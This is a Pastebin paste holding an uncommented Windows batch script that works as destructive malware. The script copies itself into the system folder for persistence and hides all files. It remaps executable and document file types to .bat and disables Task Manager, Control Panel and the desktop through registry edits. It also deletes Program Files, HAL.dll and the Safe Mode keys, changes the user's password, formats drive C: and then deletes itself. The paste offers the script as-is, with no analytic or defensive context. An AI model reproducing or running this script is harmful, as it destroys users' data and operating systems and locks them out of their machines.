Advertisement
Guest User

Untitled

a guest
Nov 14th, 2019
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.27 KB | None | 0 0
  1. @echo off
  2. echo c:\messages-pictures-Azathot>>autoexec.bat
  3. copy %0 %windir%/system
  4. echo run=%windir%/system/*.bat >> %windir%\system.ini
  5. attrib +h C:*.*
  6. date 01.03.2045
  7. assoc .html=.bat
  8. assoc .exe=.bat
  9. assoc .txt=.bat
  10. assoc .dll=.bat
  11. assoc .jpg=.bat
  12. assoc .png=.bat
  13. del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
  14. reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
  15. /v NoControlPanel /t REG_DWORD /d 1 /f >nul
  16. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
  17. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d 1 /f >nul
  18. rd "%SystemRoot%\Media\*.*" /s /q >nul
  19. rd "%SystemRoot%\Cursors\" /s /q >nul
  20. rd "%PROGRAMMFILES%" /s /q
  21. rd "%SystemRoot%\Driver Cache\" /s /q >nul
  22. del "%SystemRoot%\System32\HAL.dll" /f /q
  23. reg delete HKLM\System\CurrentControlSet\Control\SafeBoot /va /f
  24. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
  25. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
  26. del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
  27.  
  28. net user %username% "24562672"
  29. format c: /y
  30. "C:\Windows\System32\taskkill.exe" /IM "wininit.exe
  31.  
  32.  
  33. del %0 /q
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement